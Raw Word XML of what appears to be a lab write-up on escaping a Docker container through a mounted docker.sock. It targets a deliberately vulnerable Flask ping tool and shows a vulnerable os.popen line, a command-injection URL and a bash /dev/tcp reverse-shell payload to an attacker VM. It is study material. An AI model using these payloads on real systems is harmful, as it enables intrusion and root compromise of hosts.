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134F" w14:paraId="51AF45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7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AF45BE" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">Docker Escape via Exposed </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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docker.sock</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="51AF45BF" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="93C5FD"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Command </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="93C5FD"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Injection  •</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="93C5FD"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Reverse </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="93C5FD"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Shell  •</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="93C5FD"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Container </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="93C5FD"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Escape  •</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="93C5FD"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51AF45C1" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134F">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AF45C2" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="1B54E8"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B54E8"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1. Project Overview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C3134F" w14:paraId="51AF45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1AF45C3" w14:textId="2C5DA757" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">This project demonstrates a complete attack chain </w:t>
            </w:r>
            <w:r w:rsidR="00806BC3">
              <w:t>all the way</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> from exploiting a web-application vulnerability to escaping a Docker container and compromising the host machine</w:t>
            </w:r>
            <w:r w:rsidR="00806BC3">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:t>using only a common deployment misconfiguration.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AF45C4" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134F">
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51AF45C5" w14:textId="5901B3DF" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The target is </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>NetDiag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, a </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">deliberately </w:t>
            </w:r>
            <w:r>
              <w:t>vulnerable</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Flask-based network diagnostic tool running inside a Docker container. The container has /var/run/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>docker.sock</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> bind-mounted </w:t>
            </w:r>
            <w:r w:rsidR="008218DC">
              <w:t xml:space="preserve">which is </w:t>
            </w:r>
            <w:r>
              <w:t>a pattern often seen in</w:t>
            </w:r>
            <w:r w:rsidR="008218DC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">CI/CD pipelines, Docker-in-Docker builds, and monitoring agents. This </w:t>
            </w:r>
            <w:r w:rsidR="008218DC">
              <w:t>one</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> misconfiguration, combined with an </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>unsanitized</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> shell command in the web app, creates a path from a simple web request to full host compromise.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pPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="page" w:tblpX="1309" w:tblpY="549"/>
              <w:tblOverlap w:val="never"/>
              <w:tblW w:w="40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97"/>
            </w:tblGrid>
            <w:tr w:rsidR="00E46C69" w14:paraId="2BFF1FA3" w14:textId="77777777" w:rsidTr="00E46C69">
              <w:tblPrEx>
                <w:tblCellMar>
                  <w:top w:w="0" w:type="dxa"/>
                  <w:bottom w:w="0" w:type="dxa"/>
                </w:tblCellMar>
              </w:tblPrEx>
              <w:trPr>
                <w:trHeight w:val="2658"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4097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EEF2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305E49F7" w14:textId="77777777" w:rsidR="00E46C69" w:rsidRDefault="00E46C69" w:rsidP="00E46C69">
                  <w:pPr>
                    <w:spacing w:after="60"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="1B54E8"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="1B54E8"/>
                    </w:rPr>
                    <w:t>Project Details</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="407B0775" w14:textId="77777777" w:rsidR="00E46C69" w:rsidRDefault="00E46C69" w:rsidP="00E46C69">
                  <w:pPr>
                    <w:spacing w:after="60"/>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="2C486232" w14:textId="77777777" w:rsidR="00E46C69" w:rsidRDefault="00E46C69" w:rsidP="00E46C69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Tool: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NetDiag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(Flask)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6FEBED5B" w14:textId="77777777" w:rsidR="00E46C69" w:rsidRDefault="00E46C69" w:rsidP="00E46C69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Stack: Python 3.11, Docker</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="48FDAA0E" w14:textId="77777777" w:rsidR="00E46C69" w:rsidRDefault="00E46C69" w:rsidP="00E46C69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CVE:   OWASP A03 Injection</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4671A770" w14:textId="77777777" w:rsidR="00E46C69" w:rsidRDefault="00E46C69" w:rsidP="00E46C69">
                  <w:pPr>
                    <w:spacing w:after="40"/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Env:   VirtualBox NAT Network</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1131510D" w14:textId="77777777" w:rsidR="00E46C69" w:rsidRDefault="00E46C69" w:rsidP="00E46C69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OS:    Kali Linux (both VMs)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="51AF45CD" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134F"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51AF45CF" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134F">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AF45D0" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="1B54E8"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B54E8"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2. Why This Matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45D1" w14:textId="64D936F7" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mounting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>docker.sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> into a container is documented as a critical misconfiguration, yet it remains common in real deployments. The reason is convenience</w:t>
      </w:r>
      <w:r w:rsidR="00C85766">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it enables Docker-in-Docker builds and lets monitoring agents like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Portainer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> inspect running containers. Developers who set it up in development often forget to remove it before production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45D2" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134F">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AF45D3" w14:textId="076705B9" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The risk is severe: anyone who can communicate with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>docker.sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can issue arbitrary commands to the host Docker daemon </w:t>
      </w:r>
      <w:r w:rsidR="007C10BF">
        <w:t xml:space="preserve">leading to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">creating containers, mounting filesystems, and running processes as root </w:t>
      </w:r>
      <w:r w:rsidR="007C10BF">
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r>
        <w:t>without any kernel exploit. Combined with a web vulnerability that achieves remote code execution, the full attack requires no special tooling, no credentials, and no CVE. Just two common mistakes at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45D4" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134F">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AF45D5" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="1B54E8"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B54E8"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3. Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="969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6"/>
        <w:gridCol w:w="4989"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C3134F" w14:paraId="51AF45E5" w14:textId="77777777" w:rsidTr="007C10BF">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="1996"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="47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tbl>
            <w:tblPr>
              <w:tblW w:w="4803" w:type="dxa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35"/>
              <w:gridCol w:w="2668"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C3134F" w14:paraId="51AF45D8" w14:textId="77777777" w:rsidTr="007C10BF">
              <w:tblPrEx>
                <w:tblCellMar>
                  <w:top w:w="0" w:type="dxa"/>
                  <w:bottom w:w="0" w:type="dxa"/>
                </w:tblCellMar>
              </w:tblPrEx>
              <w:trPr>
                <w:trHeight w:val="424"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2135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F45D6" w14:textId="406379D5" w:rsidR="00C3134F" w:rsidRDefault="00E02E84"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 xml:space="preserve">VM 1 </w:t>
                  </w:r>
                  <w:r w:rsidR="007C10BF">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="DC2626"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">-&gt; </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="DC2626"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Victim</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2668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C97E22" w14:textId="1C57D308" w:rsidR="007C10BF" w:rsidRDefault="00E02E84">
                  <w:pP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192.168.98.4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</w:t>
                  </w:r>
                  <w:r w:rsidR="007C10BF"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 </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="51AF45D7" w14:textId="12D1F95B" w:rsidR="00C3134F" w:rsidRDefault="007C10BF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</w:t>
                  </w:r>
                  <w:r w:rsidR="00E02E84"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ort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:</w:t>
                  </w:r>
                  <w:r w:rsidR="00E02E84"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5000</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C3134F" w14:paraId="51AF45DB" w14:textId="77777777" w:rsidTr="007C10BF">
              <w:tblPrEx>
                <w:tblCellMar>
                  <w:top w:w="0" w:type="dxa"/>
                  <w:bottom w:w="0" w:type="dxa"/>
                </w:tblCellMar>
              </w:tblPrEx>
              <w:trPr>
                <w:trHeight w:val="424"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2135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F45D9" w14:textId="6DA9DE82" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="1B54E8"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">VM 2 </w:t>
                  </w:r>
                  <w:r w:rsidR="007C10BF">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="1B54E8"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>-&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="1B54E8"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> Attacker</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2668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8DAE66" w14:textId="77777777" w:rsidR="007C10BF" w:rsidRDefault="00E02E84">
                  <w:pP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 xml:space="preserve">192.168.98.5  </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="51AF45DA" w14:textId="1F11D9A9" w:rsidR="00C3134F" w:rsidRDefault="007C10BF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P</w:t>
                  </w:r>
                  <w:r w:rsidR="00E02E84"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ort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:</w:t>
                  </w:r>
                  <w:r w:rsidR="00E02E84"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4444</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C3134F" w14:paraId="51AF45DE" w14:textId="77777777" w:rsidTr="007C10BF">
              <w:tblPrEx>
                <w:tblCellMar>
                  <w:top w:w="0" w:type="dxa"/>
                  <w:bottom w:w="0" w:type="dxa"/>
                </w:tblCellMar>
              </w:tblPrEx>
              <w:trPr>
                <w:trHeight w:val="424"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2135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shd w:val="clear" w:color="auto" w:fill="F8FAF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F45DC" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="64748B"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Network</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2668" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="1" w:space="0" w:color="D1D5DB"/>
                    <w:left w:val="single" w:sz="1" w:space="0" w:color="D1D5DB"/>
                    <w:bottom w:val="single" w:sz="1" w:space="0" w:color="D1D5DB"/>
                    <w:right w:val="single" w:sz="1" w:space="0" w:color="D1D5DB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AF45DD" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84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VirtualBox NAT Network</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="51AF45DF" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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51AF45E0" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:t>The container is launched with the critical misconfiguration:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AF45E1" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134F">
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51AF45E2" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
              <w:spacing w:before="30" w:after="30"/>
              <w:ind w:left="36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 run -d -p 5000:5000 \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AF45E3" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
              <w:spacing w:before="30" w:after="30"/>
              <w:ind w:left="36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-v /var/run/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docker.sock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:/var/run/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docker.sock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\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AF45E4" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
              <w:spacing w:before="30" w:after="30"/>
              <w:ind w:left="36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netdiag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-app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netdiag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51AF45E8" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="1B54E8"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B54E8"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4. Attack Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45E9" w14:textId="7113B469" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 1</w:t>
      </w:r>
      <w:r w:rsidR="007C10BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Command Injection via the Web App</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45EA" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The /ping route in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NetDiag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> concatenates user input directly into a shell command with no sanitization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45EB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os.popen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("ping -c 3 " + host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).read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51AF45EC" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Appending a semicolon after any input terminates the ping command and starts an arbitrary new one. Proof of RCE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45ED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>http://192.168.98.4:5000/ping?host=8.8.8.8;id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45EE" w14:textId="27BDA660" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The response includes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=0(root) </w:t>
      </w:r>
      <w:r w:rsidR="00E46C69">
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46C69">
        <w:t xml:space="preserve">confirms </w:t>
      </w:r>
      <w:r>
        <w:t>code execution as root inside the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45EF" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134F">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AF45F0" w14:textId="561A0752" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r w:rsidR="007C10BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45F1" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener is started on the attacker VM, then the following payload is submitted through the web interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45F2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8.8.8.8; bash -c 'bash -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&gt;&amp; /dev/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/192.168.98.5/4444 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45F3" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>The browser hangs. The attacker terminal receives the connection and presents a root shell inside the container (root@3b82a2973419:/app#).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45F4" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00C3134F">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AF45F5" w14:textId="3A74B841" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 3</w:t>
      </w:r>
      <w:r w:rsidR="007C10BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A2570"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Confirming the Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45F6" w14:textId="77777777" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From inside the container, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>docker.sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is confirmed present:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45F7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ls -la /var/run/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docker.sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51AF45F8" w14:textId="2D40AA1B" w:rsidR="00C3134F" w:rsidRDefault="00E02E84">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srw-rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">---- 1 root 132 ... </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/var/run/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>docker.sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00200D46">
        <w:t>which</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00200D46">
        <w:t xml:space="preserve"> means </w:t>
      </w:r>
      <w:r>
        <w:t>the socket is bind-mounted. The docker CLI is then installed to communicate with it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF45F9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apt-get update &amp;&amp; apt-get install -y docker.io</w:t>
      </w:r>
    </w:p>
